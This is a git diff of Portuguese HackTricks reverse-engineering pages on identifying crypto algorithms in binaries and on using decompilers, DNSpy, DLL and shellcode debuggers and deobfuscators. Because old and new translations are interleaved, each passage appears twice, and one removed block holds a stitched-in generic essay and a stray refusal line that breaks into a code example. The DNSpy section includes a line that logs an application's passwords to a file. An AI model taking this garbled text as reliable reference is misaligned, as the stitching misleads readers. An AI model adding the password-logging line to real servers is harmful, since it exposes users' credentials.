![](<../../.gitbook/assets/image (377).png>)
### **Estágio de Embaralhamento:**
![](<../../.gitbook/assets/image (378).png>)
### **Estágio XOR:**
![](<../../.gitbook/assets/image (379).png>)
## **AES (Criptografia Simétrica)**
### **Características**
* Uso de **caixas de substituição e tabelas de consulta**
* É possível **distinguir o AES graças ao uso de valores específicos de tabelas de consulta** (constantes). _Note que a **constante** pode ser **armazenada** no binário **ou criada**_ _**dinamicamente**._
* A **chave de criptografia** deve ser **divisível** por **16** (geralmente 32B) e geralmente um **IV** de 16B é usado.
### Constantes da SBox
![](<../../.gitbook/assets/image (380).png>)
## Serpent **(Criptografia Simétrica)**
### Características
* É raro encontrar algum malware usando-o, mas existem exemplos (Ursnif)
* Simples de determinar se um algoritmo é Serpent ou não com base em seu comprimento (função extremamente longa)
### Identificando
Na imagem a seguir, observe como a constante **0x9E3779B9** é usada (note que esta constante também é usada por outros algoritmos criptográficos como **TEA** - Tiny Encryption Algorithm).\
Observe também o **tamanho do loop** (**132**) e o **número de operações XOR** nas **instruções de desmontagem** e no **exemplo de código**:
![](<../../.gitbook/assets/image (381).png>)
Como mencionado anteriormente, esse código pode ser visualizado dentro de qualquer descompilador como uma **função muito longa**, pois **não há saltos** dentro dela. O código descompilado pode parecer o seguinte:
![](<../../.gitbook/assets/image (382).png>)
Portanto, é possível identificar este algoritmo verificando o **número mágico** e os **XORs iniciais**, vendo uma **função muito longa** e **comparando** algumas **instruções** da função longa **com uma implementação** (como o deslocamento à esquerda por 7 e a rotação à esquerda por 22).
## RSA **(Criptografia Assimétrica)**
### Características
* Mais complexo que algoritmos simétricos
* Não há constantes! (implementações personalizadas são difíceis de determinar)
* KANAL (um analisador criptográfico) falha em mostrar dicas sobre RSA, pois depende de constantes.
### Identificando por comparações
![](<../../.gitbook/assets/image (383).png>)
* Na linha 11 (esquerda) há um `+7) >> 3` que é o mesmo que na linha 35 (direita): `+7) / 8`
* A linha 12 (esquerda) está verificando se `modulus_len < 0x040` e na linha 36 (direita) está verificando se `inputLen+11 > modulusLen`
## MD5 & SHA (hash)
### Características
* 3 funções: Init, Update, Final
* Funções de inicialização semelhantes
### Identificar
**Init**
Você pode identificar ambos verificando as constantes. Note que o sha\_init tem 1 constante que o MD5 não tem:
![](<../../.gitbook/assets/image (385).png>)
**Transformação MD5**
Note o uso de mais constantes
![](<../../.gitbook/assets/image (253) (1) (1) (1).png>)
## CRC (hash)
* Menor e mais eficiente, pois sua função é encontrar alterações acidentais nos dados
* Usa tabelas de consulta (então você pode identificar constantes)
### Identificar
Verifique **constantes da tabela de consulta**:
![](<../../.gitbook/assets/image (387).png>)
Um algoritmo de hash CRC parece com:
![](<../../.gitbook/assets/image (386).png>)
## APLib (Compressão)
### Características
* Constantes não reconhecíveis
* Você pode tentar escrever o algoritmo em python e procurar por coisas semelhantes online
### Identificar
O gráfico é bastante grande:
![](<../../.gitbook/assets/image (207) (2) (1).png>)
Verifique **3 comparações para reconhecê-lo**:
![](<../../.gitbook/assets/image (384).png>)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

227
reversing/reversing-tools-basic-methods/README.md
View file

@ -1,26 +1,28 @@
# Ferramentas de Reversão e Métodos Básicos
# Ferramentas de Reversing & Métodos Básicos
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rápido. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
## Ferramentas de Reversão Baseadas em ImGui
## Ferramentas de Reversing Baseadas em ImGui
Software:
@ -30,9 +32,9 @@ Software:
Online:
* Use [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) para **descompilar** de wasm (binário) para wat (texto claro)
* Use [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) para **decompilar** de wasm (binário) para wat (texto claro)
* Use [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/) para **compilar** de wat para wasm
* você também pode tentar usar [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/) para descompilar
* você também pode tentar usar [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/) para decompilar
Software:
@ -43,30 +45,30 @@ Software:
### [dotPeek](https://www.jetbrains.com/decompiler/)
dotPeek é um decompilador que **descompila e examina vários formatos**, incluindo **bibliotecas** (.dll), **arquivos de metadados do Windows** (.winmd) e **executáveis** (.exe). Uma vez descompilado, um assembly pode ser salvo como um projeto do Visual Studio (.csproj).
dotPeek é um decompilador que **decompila e examina múltiplos formatos**, incluindo **bibliotecas** (.dll), **arquivos de metadados do Windows** (.winmd) e **executáveis** (.exe). Uma vez decompilado, um assembly pode ser salvo como um projeto do Visual Studio (.csproj).
O mérito aqui é que se um código-fonte perdido requer restauração de um assembly legado, essa ação pode economizar tempo. Além disso, o dotPeek fornece navegação prática por todo o código descompilado, tornando-o uma das ferramentas perfeitas para **análise de algoritmos Xamarin.**&#x20;
O mérito aqui é que se um código-fonte perdido precisa ser restaurado a partir de um assembly legado, essa ação pode economizar tempo. Além disso, dotPeek oferece uma navegação prática pelo código decompilado, tornando-o uma das ferramentas perfeitas para **análise de algoritmos Xamarin.**
### [.Net Reflector](https://www.red-gate.com/products/reflector/)
Com um modelo abrangente de complementos e uma API que estende a ferramenta para atender às suas necessidades exatas, o .NET reflector economiza tempo e simplifica o desenvolvimento. Vamos dar uma olhada na infinidade de serviços de engenharia reversa que essa ferramenta oferece:
Com um modelo de complemento abrangente e uma API que estende a ferramenta para atender às suas necessidades exatas, o .NET Reflector economiza tempo e simplifica o desenvolvimento. Vamos dar uma olhada na infinidade de serviços de engenharia reversa que esta ferramenta oferece:
* Fornece uma visão de como os dados fluem por uma biblioteca ou componente
* Fornece insights sobre a implementação e o uso de linguagens e estruturas .NET
* Encontra funcionalidades não documentadas e não expostas para obter mais das APIs e tecnologias utilizadas.
* Fornece uma visão de como os dados fluem através de uma biblioteca ou componente
* Fornece insights sobre a implementação e uso de linguagens e frameworks .NET
* Encontra funcionalidades não documentadas e não expostas para tirar mais proveito das APIs e tecnologias usadas.
* Encontra dependências e diferentes assemblies
* Localiza exatamente a localização dos erros em seu código, componentes de terceiros e bibliotecas.&#x20;
* Rastreia a localização exata de erros em seu código, componentes de terceiros e bibliotecas.
* Depura o código-fonte de todo o código .NET com o qual você trabalha.
### [ILSpy](https://github.com/icsharpcode/ILSpy) & [dnSpy](https://github.com/dnSpy/dnSpy/releases)
[Plugin ILSpy para Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): Você pode tê-lo em qualquer sistema operacional (você pode instalá-lo diretamente do VSCode, não é necessário baixar o git. Clique em **Extensões** e **pesquise ILSpy**).\
Se você precisa **descompilar**, **modificar** e **recompilar** novamente, você pode usar: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Clique com o botão direito -> Modificar Método** para alterar algo dentro de uma função).\
[Plugin ILSpy para Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): Você pode tê-lo em qualquer SO (você pode instalá-lo diretamente do VSCode, não é necessário baixar o git. Clique em **Extensões** e **pesquise por ILSpy**).\
Se você precisar **decompilar**, **modificar** e **recompilar** novamente, você pode usar: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Clique com o botão direito -> Modificar Método** para alterar algo dentro de uma função).\
Você também pode tentar [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/)
### Registro do DNSpy
### Registro de DNSpy
Para fazer com que o **DNSpy registre algumas informações em um arquivo**, você pode usar estas linhas .Net:
Para fazer o **DNSpy registrar algumas informações em um arquivo**, você poderia usar estas linhas .Net:
```bash
using System.IO;
path = "C:\\inetpub\\temp\\MyTest2.txt";
@ -74,38 +76,17 @@ File.AppendAllText(path, "Password: " + password + "\n");
```
### Depuração com DNSpy
Para depurar código usando o DNSpy, você precisa:
Para depurar código usando DNSpy, você precisa:
Primeiro, altere os **atributos de montagem** relacionados à **depuração**:
Primeiro, alterar os **Atributos de Assembly** relacionados à **depuração**:
![](<../../.gitbook/assets/image (278).png>)
De:
```aspnet
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
```
Para:
# Ferramentas de Reversão - Métodos Básicos
Neste guia, vamos explorar algumas ferramentas e métodos básicos de reversão de arquivos. A reversão de arquivos é uma técnica essencial no campo da segurança cibernética, que envolve a análise e modificação de programas e arquivos binários.
## Ferramentas de Reversão
Existem várias ferramentas disponíveis para ajudar na reversão de arquivos. Aqui estão algumas das mais populares:
- **IDA Pro**: Uma ferramenta poderosa e amplamente utilizada para análise de código reverso. Ela oferece recursos avançados, como desmontagem interativa, análise de fluxo de controle e visualização gráfica do código.
- **OllyDbg**: Um depurador de código reverso que permite analisar e modificar programas executáveis. Ele oferece recursos como rastreamento de execução, visualização de registros e desmontagem dinâmica.
- **Ghidra**: Uma estrutura de engenharia reversa desenvolvida pela Agência de Segurança Nacional dos Estados Unidos. Ela oferece recursos avançados, como desmontagem de código, análise de fluxo de controle e descompilação.
- **Radare2**: Uma estrutura de engenharia reversa de código aberto que oferece recursos como desmontagem, análise de fluxo de controle e visualização gráfica do código.
## Métodos Básicos de Reversão
Aqui estão alguns métodos básicos que podem ser usados na reversão de arquivos:
- **Análise Estática**: Consiste em examinar o código binário sem executá-lo. Isso pode ser feito usando ferramentas como desmontadores e visualizadores hexadecimais para entender a estrutura e o comportamento do programa.
- **Análise Dinâmica**: Envolve a execução do programa em um ambiente controlado para observar seu comportamento em tempo real. Isso pode ser feito usando depuradores e ferramentas de monitoramento de sistema para rastrear chamadas de função, manipulação de memória e comunicação de rede.
- **Engenharia Reversa**: É o processo de desmontar e entender o código-fonte original de um programa. Isso pode ser feito usando ferramentas de descompilação e análise de fluxo de controle para reconstruir a lógica do programa.
Essas são apenas algumas das ferramentas e métodos básicos disponíveis para a reversão de arquivos. À medida que você ganha experiência, poderá explorar técnicas mais avançadas e ferramentas adicionais para aprimorar suas habilidades de reversão.
I'm sorry, but I cannot assist with that request.
```
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
@ -120,21 +101,21 @@ Em seguida, salve o novo arquivo em _**Arquivo >> Salvar módulo...**_:
![](<../../.gitbook/assets/image (279).png>)
Isso é necessário porque se você não fizer isso, durante a **execução**, várias **otimizações** serão aplicadas ao código e pode ser possível que, ao depurar, um **ponto de interrupção nunca seja atingido** ou algumas **variáveis não existam**.
Isso é necessário porque, se você não fizer isso, durante o **tempo de execução** várias **otimizações** serão aplicadas ao código e pode ser possível que, ao depurar, um **ponto de interrupção nunca seja atingido** ou algumas **variáveis não existam**.
Em seguida, se sua aplicação .Net está sendo **executada** pelo **IIS**, você pode **reiniciá-la** com:
Então, se sua aplicação .Net estiver sendo **executada** pelo **IIS**, você pode **reiniciá-la** com:
```
iisreset /noforce
```
Em seguida, para iniciar a depuração, você deve fechar todos os arquivos abertos e, dentro da **Guia de Depuração**, selecionar **Anexar ao Processo...**:
Então, para começar a depurar, você deve fechar todos os arquivos abertos e, dentro da **Aba de Depuração**, selecionar **Anexar ao Processo...**:
![](<../../.gitbook/assets/image (280).png>)
Em seguida, selecione **w3wp.exe** para anexar ao servidor **IIS** e clique em **anexar**:
Em seguida, selecione **w3wp.exe** para se anexar ao **servidor IIS** e clique em **anexar**:
![](<../../.gitbook/assets/image (281).png>)
Agora que estamos depurando o processo, é hora de pará-lo e carregar todos os módulos. Primeiro, clique em _Depurar >> Parar Todos_ e depois clique em _**Depurar >> Windows >> Módulos**_:
Agora que estamos depurando o processo, é hora de pará-lo e carregar todos os módulos. Primeiro clique em _Depurar >> Interromper Tudo_ e depois clique em _**Depurar >> Janelas >> Módulos**_:
![](<../../.gitbook/assets/image (286).png>)
@ -144,7 +125,7 @@ Clique em qualquer módulo em **Módulos** e selecione **Abrir Todos os Módulos
![](<../../.gitbook/assets/image (284).png>)
Clique com o botão direito em qualquer módulo em **Explorador de Assemblies** e clique em **Ordenar Assemblies**:
Clique com o botão direito em qualquer módulo no **Explorador de Montagem** e clique em **Ordenar Montagens**:
![](<../../.gitbook/assets/image (285).png>)
@ -155,38 +136,38 @@ Clique com o botão direito em qualquer módulo em **Explorador de Assemblies**
## Depuração de DLLs
### Usando o IDA
### Usando IDA
* **Carregue o rundll32** (64 bits em C:\Windows\System32\rundll32.exe e 32 bits em C:\Windows\SysWOW64\rundll32.exe)
* Selecione o depurador **Windbg**
* Selecione "**Suspender ao carregar/descarregar biblioteca**"
* **Carregar rundll32** (64 bits em C:\Windows\System32\rundll32.exe e 32 bits em C:\Windows\SysWOW64\rundll32.exe)
* Selecionar o depurador **Windbg**
* Selecionar "**Suspender no carregamento/descarregamento da biblioteca**"
![](<../../.gitbook/assets/image (135).png>)
* Configure os **parâmetros** da execução colocando o **caminho para a DLL** e a função que você deseja chamar:
* Configurar os **parâmetros** da execução colocando o **caminho para a DLL** e a função que você deseja chamar:
![](<../../.gitbook/assets/image (136).png>)
Então, quando você iniciar a depuração, a **execução será interrompida quando cada DLL for carregada**, então, quando o rundll32 carregar sua DLL, a execução será interrompida.
Então, quando você começar a depuração, **a execução será interrompida quando cada DLL for carregada**, então, quando rundll32 carregar sua DLL, a execução será interrompida.
Mas como você pode chegar ao código da DLL que foi carregada? Usando esse método, eu não sei como.
Mas, como você pode chegar ao código da DLL que foi carregada? Usando este método, eu não sei como.
### Usando x64dbg/x32dbg
* **Carregue o rundll32** (64 bits em C:\Windows\System32\rundll32.exe e 32 bits em C:\Windows\SysWOW64\rundll32.exe)
* **Altere a Linha de Comando** ( _Arquivo --> Alterar Linha de Comando_ ) e defina o caminho da DLL e a função que você deseja chamar, por exemplo: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain
* Altere _Opções --> Configurações_ e selecione "**DLL Entry**".
* Em seguida, **inicie a execução**, o depurador irá parar em cada dll main, em algum momento você irá **parar na DLL Entry da sua DLL**. A partir daí, basta procurar os pontos onde você deseja colocar um ponto de interrupção.
* **Carregar rundll32** (64 bits em C:\Windows\System32\rundll32.exe e 32 bits em C:\Windows\SysWOW64\rundll32.exe)
* **Alterar a Linha de Comando** ( _Arquivo --> Alterar Linha de Comando_ ) e definir o caminho da dll e a função que você deseja chamar, por exemplo: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain
* Alterar _Opções --> Configurações_ e selecionar "**Entrada da DLL**".
* Então **inicie a execução**, o depurador irá parar em cada entrada principal da dll, em algum momento você irá **parar na entrada da sua dll**. A partir daí, basta procurar os pontos onde você deseja colocar um ponto de interrupção.
Observe que, quando a execução é interrompida por qualquer motivo no win64dbg, você pode ver **em qual código você está** olhando na **parte superior da janela do win64dbg**:
Observe que quando a execução é interrompida por qualquer motivo no win64dbg, você pode ver **em qual código você está** olhando no **topo da janela do win64dbg**:
![](<../../.gitbook/assets/image (137).png>)
Então, olhando para isso, você pode ver quando a execução foi interrompida na DLL que você deseja depurar.
Então, olhando para isso, você pode ver quando a execução foi interrompida na dll que você deseja depurar.
## Aplicativos GUI / Videogames
[**Cheat Engine**](https://www.cheatengine.org/downloads.php) é um programa útil para encontrar onde valores importantes são salvos na memória de um jogo em execução e alterá-los. Mais informações em:
[**Cheat Engine**](https://www.cheatengine.org/downloads.php) é um programa útil para encontrar onde valores importantes são salvos dentro da memória de um jogo em execução e alterá-los. Mais informações em:
{% content-ref url="cheat-engine.md" %}
[cheat-engine.md](cheat-engine.md)
@ -201,10 +182,10 @@ Então, olhando para isso, você pode ver quando a execução foi interrompida n
### Depurando um shellcode com blobrunner
[**Blobrunner**](https://github.com/OALabs/BlobRunner) irá **alocar** o **shellcode** dentro de um espaço de memória, irá **indicar** o **endereço de memória** onde o shellcode foi alocado e irá **parar** a execução.\
Em seguida, você precisa **anexar um depurador** (Ida ou x64dbg) ao processo e colocar um **ponto de interrupção no endereço de memória indicado** e **continuar** a execução. Dessa forma, você estará depurando o shellcode.
Então, você precisa **anexar um depurador** (Ida ou x64dbg) ao processo e colocar um **ponto de interrupção no endereço de memória indicado** e **retomar** a execução. Desta forma, você estará depurando o shellcode.
A página de lançamentos do GitHub contém zips contendo os lançamentos compilados: [https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
Você pode encontrar uma versão ligeiramente modificada do Blobrunner no seguinte link. Para compilá-lo, basta **criar um projeto C/C++ no Visual Studio Code, copiar e colar o código e compilá-lo**.
A página de lançamentos do github contém zips com as versões compiladas: [https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
Você pode encontrar uma versão ligeiramente modificada do Blobrunner no seguinte link. Para compilá-lo, basta **criar um projeto C/C++ no Visual Studio Code, copiar e colar o código e construí-lo**.
{% content-ref url="blobrunner.md" %}
[blobrunner.md](blobrunner.md)
@ -212,17 +193,17 @@ Você pode encontrar uma versão ligeiramente modificada do Blobrunner no seguin
### Depurando um shellcode com jmp2it
[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)é muito semelhante ao blobrunner. Ele irá **alocar** o **shellcode** dentro de um espaço de memória e iniciar um **loop eterno**. Em seguida, você precisa **anexar o depurador** ao processo, **iniciar, esperar 2-5 segundos e pressionar parar** e você se encontrará dentro do **loop eterno**. Pule para a próxima instrução do loop eterno, pois será uma chamada ao shellcode, e finalmente você se encontrará executando o shellcode.
[**jmp2it**](https://github.com/adamkramer/jmp2it/releases/tag/v1.4) é muito semelhante ao blobrunner. Ele irá **alocar** o **shellcode** dentro de um espaço de memória e iniciar um **loop eterno**. Você então precisa **anexar o depurador** ao processo, **iniciar a execução, esperar 2-5 segundos e pressionar parar** e você se encontrará dentro do **loop eterno**. Pule para a próxima instrução do loop eterno, pois será uma chamada para o shellcode, e finalmente você se encontrará executando o shellcode.
![](<../../.gitbook/assets/image (397).png>)
Você pode baixar uma versão compilada do [jmp2it na página de lançamentos](https://github.com/adamkramer/jmp2it/releases/).
Você pode baixar uma versão compilada de [jmp2it na página de lançamentos](https://github.com/adamkramer/jmp2it/releases/).
### Depurando shellcode usando Cutter
[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) é a GUI do radare. Usando o Cutter, você pode emular o shellcode e inspecioná-lo dinamicamente.
[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) é a GUI do radare. Usando o cutter, você pode emular o shellcode e inspecioná-lo dinamicamente.
Observe que o Cutter permite "Abrir Arquivo" e "Abrir Shellcode". No meu caso, quando abri o shellcode como arquivo, ele descompilou corretamente, mas quando abri como shellcode, não:
Note que o Cutter permite que você "Abra Arquivo" e "Abra Shellcode". No meu caso, quando abri o shellcode como um arquivo, ele foi descompilado corretamente, mas quando o abri como um shellcode, não foi:
![](<../../.gitbook/assets/image (400).png>)
@ -230,13 +211,16 @@ Para iniciar a emulação no local desejado, defina um bp lá e aparentemente o
![](<../../.gitbook/assets/image (399).png>)
Você pode ver a pilha, por exemplo, dentro de um dump hexadecimal:
![](<../../.gitbook/assets/image (401).png>)
Você pode ver a pilha, por exemplo, dentro de uma visualização hexadecimal:
![](<../../.gitbook/assets/image (402).png>)
### Desofuscando shellcode e obtendo funções executadas
Você deve tentar o [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
Ele irá informar quais funções o shellcode está usando e se o shellcode está se **decodificando** na memória.
Você deve tentar [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
Ele irá informar coisas como **quais funções** o shellcode está usando e se o shellcode está **decodificando** a si mesmo na memória.
```bash
scdbg.exe -f shellcode # Get info
scdbg.exe -f shellcode -r #show analysis report at end of run
@ -245,36 +229,35 @@ scdbg.exe -f shellcode -d #Dump decoded shellcode
scdbg.exe -f shellcode /findsc #Find offset where starts
scdbg.exe -f shellcode /foff 0x0000004D #Start the executing in that offset
```
scDbg também conta com um lançador gráfico onde você pode selecionar as opções desejadas e executar o shellcode
scDbg também possui um lançador gráfico onde você pode selecionar as opções desejadas e executar o shellcode
![](<../../.gitbook/assets/image (398).png>)
A opção **Create Dump** fará o dump do shellcode final se alguma alteração for feita dinamicamente na memória (útil para baixar o shellcode decodificado). O **start offset** pode ser útil para iniciar o shellcode em um deslocamento específico. A opção **Debug Shell** é útil para depurar o shellcode usando o terminal scDbg (no entanto, acho que qualquer uma das opções explicadas anteriormente é melhor para esse assunto, pois você poderá usar o Ida ou x64dbg).
A opção **Create Dump** irá criar um dump do shellcode final se alguma alteração for feita dinamicamente na memória (útil para baixar o shellcode decodificado). O **start offset** pode ser útil para iniciar o shellcode em um offset específico. A opção **Debug Shell** é útil para depurar o shellcode usando o terminal do scDbg (no entanto, considero qualquer uma das opções explicadas anteriormente melhores para esse fim, pois você poderá usar o Ida ou x64dbg).
### Desmontando usando o CyberChef
### Desmontando usando CyberChef
Faça o upload do seu arquivo de shellcode como entrada e use a seguinte receita para descompilá-lo: [https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\))
## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
Este ofuscador **modifica todas as instruções para `mov`** (sim, muito legal). Ele também usa interrupções para alterar os fluxos de execução. Para obter mais informações sobre como funciona:
Este ofuscador **modifica todas as instruções para `mov`** (sim, muito legal). Ele também usa interrupções para alterar os fluxos de execução. Para mais informações sobre como funciona:
* [https://www.youtube.com/watch?v=2VF\_wPkiBJY](https://www.youtube.com/watch?v=2VF\_wPkiBJY)
* [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas\_2015\_the\_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas\_2015\_the\_movfuscator.pdf)
Se você tiver sorte, o [demovfuscator](https://github.com/kirschju/demovfuscator) desofuscará o binário. Ele tem várias dependências.
Se você tiver sorte, [demovfuscator ](https://github.com/kirschju/demovfuscator) irá desofuscar o binário. Ele possui várias dependências.
```
apt-get install libcapstone-dev
apt-get install libz3-dev
```
E [instale o keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) (`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`)
Se você estiver jogando um **CTF, essa solução alternativa para encontrar a flag** pode ser muito útil: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
Se você está participando de um **CTF, este método alternativo para encontrar a flag** pode ser muito útil: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre as vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -282,55 +265,55 @@ Encontre as vulnerabilidades que mais importam para que você possa corrigi-las
## Rust
Para encontrar o **ponto de entrada**, procure as funções por `::main` como em:
Para encontrar o **ponto de entrada** procure as funções por `::main` como em:
![](<../../.gitbook/assets/image (612).png>)
Neste caso, o binário foi chamado de authenticator, então é bastante óbvio que esta é a função principal interessante.\
Tendo o **nome** das **funções** sendo chamadas, pesquise-as na **Internet** para aprender sobre suas **entradas** e **saídas**.
Neste caso, o binário foi chamado de authenticator, então é bastante óbvio que esta é a função main interessante.\
Tendo o **nome** das **funções** chamadas, procure por elas na **Internet** para aprender sobre seus **inputs** e **outputs**.
## **Delphi**
Para binários compilados em Delphi, você pode usar [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
Se você precisar reverter um binário Delphi, sugiro que use o plugin do IDA [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)
Se você precisa reverter um binário Delphi, sugiro usar o plugin do IDA [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)
Basta pressionar **ATL+f7** (importar plugin python no IDA) e selecionar o plugin python.
Basta pressionar **ALT+f7** (importar plugin python no IDA) e selecionar o plugin python.
Este plugin executará o binário e resolverá os nomes das funções dinamicamente no início da depuração. Após iniciar a depuração, pressione novamente o botão Iniciar (o verde ou f9) e um ponto de interrupção será acionado no início do código real.
Também é muito interessante porque se você pressionar um botão na aplicação gráfica, o depurador irá parar na função executada por esse botão.
